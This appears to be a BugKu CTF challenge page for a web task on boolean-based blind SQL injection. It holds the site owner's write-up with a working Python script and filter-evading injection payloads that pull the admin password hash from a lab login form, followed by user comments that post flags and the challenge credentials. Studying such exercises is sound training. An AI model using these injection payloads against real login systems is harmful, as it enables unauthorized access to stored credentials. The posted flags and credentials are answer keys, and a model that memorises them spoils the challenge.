列表

详情


sql注入

平台   WEB   已通过

题目作者: 未知

一  血: ‌‌‌‌‌dotast

一血奖励: 5金币

解  决: 3013

提  示:

描  述: 基于布尔的SQL盲注 sql注入

站长题解:

据说有弱口令admin/bugkuctf

常规做法:

#布尔盲注不仅仅是在密码正确和密码错误两种情况下,比如你输入账户,可能出现“账户不存在”和“存在”两种情况,这也是布尔。
import requests
import string,hashlib
url = 'http://114.67.175.224:15673/'
sss = string.digits + (string.ascii_lowercase)
a = ''
for i in range(1, 50):
    flag = 0
    for j in sss:
        payload = "admin'^((ascii(mid((select(password)from(admin))from(%s))))<>%s)^1#" % (i, ord(j))
        #屏蔽了",",改用mid()函数,from表示起始位置
        #ascii()当传入一个字符串时取出第一个字母的ascii(),相当于mid()的第二参数,for取出,也相当于limit
        #<>表示不等号
        #^表示异或
        payload2= "admin123'or((ascii(mid((select(password)from(admin))from(%s))))<>%s)#"%(i,ord(j))
        #由于没有屏蔽or,所以也可以用这个,可以形成一组布尔
        payload3= "admin123'or((ascii(mid((select(database()))from(%s))))<>%s)#"%(i,ord(j))
        
        data = {'username': payload, 'password': 'admin'}
        res = requests.post(url, data=data).text
        if 'username does not exist!' in res:
            a += j
            flag = 1
            print(a)
            break
    if flag == 0:
        break
 
print(a)

跑出来密码的md5值4dcc88f8f1bc05e7c2ad1a60288481a2,去cmd5解密,得到密码为bugkuctf

去做题

a364988772 @ 2024-05-07 23:21:44 👍0

flag{c2409eaa44654247abc642be280892c2}


0124星月坊 @ 2024-05-07 23:21:44 👍0

嗯,这个是要用SQL来做吗


dongwenjia @ 2024-04-07 23:21:44 👍0

给个建议,提交完flag后,能不能不收币呀,不觉的很不合理吗。


非常的Amazing @ 2024-03-07 23:21:44 👍0

flag{82408c2db551858d0f93f22b4503ddc9}


GET-lee @ 2024-02-07 23:21:44 👍1

直接弱口令了,密码是bugkuctf


htttpss @ 2024-02-07 23:21:44 👍0

用户名:admin 密码:bugkuctf


htttpss @ 2024-02-07 23:21:44 👍0

歧视我吗,连页面都打不开


一路奔腾 @ 2024-02-07 23:21:44 👍1

参考他:https://blog.csdn.net/bin789456/article/details/119851596


daywaiday @ 2024-02-07 23:21:44 👍0

sql注入后得到:得到md5,32位:4dcc88f8f1bc05e7c2ad1a60288481a2 ,但md5是不可逆,通过其他网站也没有查出来得bugkuctf ,完全靠猜不正常


mc3189907168 @ 2024-02-07 23:21:44 👍0

@htttpss 哥,求一下字典啊,我找不到啊。


htttpss @ 2024-02-07 23:21:44 👍0

用字典试试吧,好歹能把用户名试出来


falg @ 2023-10-07 23:21:44 👍0

flag{e0ae73e854c8dbd6bb51f3b8bd57e8f0}